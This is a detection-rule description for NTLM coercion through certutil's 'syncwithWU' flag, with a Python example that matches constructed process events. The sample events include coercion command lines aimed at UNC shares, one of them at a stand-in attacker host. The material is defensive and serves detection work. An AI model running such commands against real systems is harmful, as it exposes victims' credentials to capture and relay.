
Summary
This rule detects potential NTLM authentication coercion via the built-in Certutil.exe utility on Windows. NTLM coercion forces a victim host (or the account a service runs as) to authenticate to an attacker-controlled server, where the NTLM exchange can be captured for offline cracking or relayed to another service; it abuses legitimate functionality rather than a flaw in certutil itself. The detection focuses on certutil invoked with the 'syncwithWU' flag, whose intended use is to download the Windows Update root certificate set into a folder: when the destination is a UNC path (\\host\share) instead of a local directory, the machine connects to that host over SMB and authenticates, which is the behaviour an attacker triggers. The rule identifies Certutil.exe processes by checking whether the executable's path ends with 'certutil.exe' or whether the binary's original filename (taken from its version metadata) matches, so a renamed copy is still covered, and it requires that the command line contain the keywords tied to this coercion technique, i.e. the flag together with a UNC destination. Legitimate administrative use of 'syncwithWU' normally writes to a local folder, so a UNC destination, particularly one pointing at a host that is not a known file server, warrants review of the target host named in the command line and of the account that launched the process. This detection supports monitoring for NTLM-based attacks that exploit weaknesses in Windows authentication, such as relay to services that do not enforce signing.
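The detection logic described above, applied to a handful of constructed process-creation events, as an added Python example that is not part of the rule or of any detection repository. The field names (Image, OriginalFileName, CommandLine) follow Sysmon event ID 1 conventions and the events are made up for illustration; the UNC-path regular expression and the decision to treat both '-' and '/' option prefixes alike are this example's own assumptions:

```python
import re
from typing import Dict, List

# Constructed sample events (Sysmon event ID 1 style fields). Not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # 1. classic coercion: UNC destination forces SMB authentication to the listed host
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -syncWithWU \\10.0.0.5\share",
    },
    {   # 2. renamed binary with '/' option prefix; OriginalFileName (PE version info) still matches
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"svc.exe /syncwithwu \\evil.example\c$",
    },
    {   # 3. legitimate offline root-certificate download to a local folder: must NOT match
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -syncWithWU C:\roots",
    },
    {   # 4. unrelated certutil use: must NOT match
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -hashfile C:\tmp\file.bin SHA256",
    },
    {   # 5. another tool touching a UNC path: must NOT match (not certutil)
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r"cmd /c dir \\fileserver\share",
    },
]

# A UNC path token: two backslashes followed by a host name, at the start of the
# command line or after whitespace. Assumption: this is sufficient for argument parsing here.
UNC_PATH = re.compile(r"(?:^|\s)\\\\[^\s\\]+")


def is_certutil(event: Dict[str, str]) -> bool:
    """Process selection: image path ends with certutil.exe OR original filename matches.

    Comparison is case-insensitive because Windows paths and PE metadata are."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\certutil.exe") or original == "certutil.exe"


def has_coercion_args(cmdline: str) -> bool:
    """Command-line condition: the syncwithWU flag plus a UNC destination.

    A bare substring match on 'syncwithwu' covers both '-syncWithWU' and
    '/syncwithwu' (assumed equivalent here) and any letter casing."""
    lowered = cmdline.lower()
    return "syncwithwu" in lowered and UNC_PATH.search(cmdline) is not None


def detect(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of events that satisfy both rule conditions."""
    return [e["CommandLine"] for e in events
            if is_certutil(e) and has_coercion_args(e.get("CommandLine", ""))]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT certutil NTLM coercion:", hit)
```

Only events 1 and 2 fire. Event 3 shows why the UNC condition matters: the same flag against a local folder is the documented, benign use. The OriginalFileName check catches a renamed copy, but an attacker who strips or rewrites the PE version resource evades it, so a network-side check (unexpected outbound SMB from a workstation to a non-file-server host) is a useful complement to this process-based rule.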
Categories
- Windows
- Endpoint
Data Sources
- Process
Created: 2022-09-01